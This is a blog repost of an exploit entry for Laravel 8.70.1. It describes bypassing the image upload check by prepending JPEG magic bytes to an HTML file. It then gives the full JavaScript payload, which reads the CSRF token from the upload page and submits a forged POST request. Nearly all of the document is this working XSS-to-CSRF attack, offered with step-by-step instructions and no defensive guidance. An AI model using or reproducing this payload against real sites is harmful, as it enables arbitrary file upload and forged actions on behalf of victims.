Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863550878

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }
	//
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tels it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
	//Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}
getTokenJS();

var POST_URL="/"
getTokenJS();

</script>
</html>

3- Save it as Html file and upload it.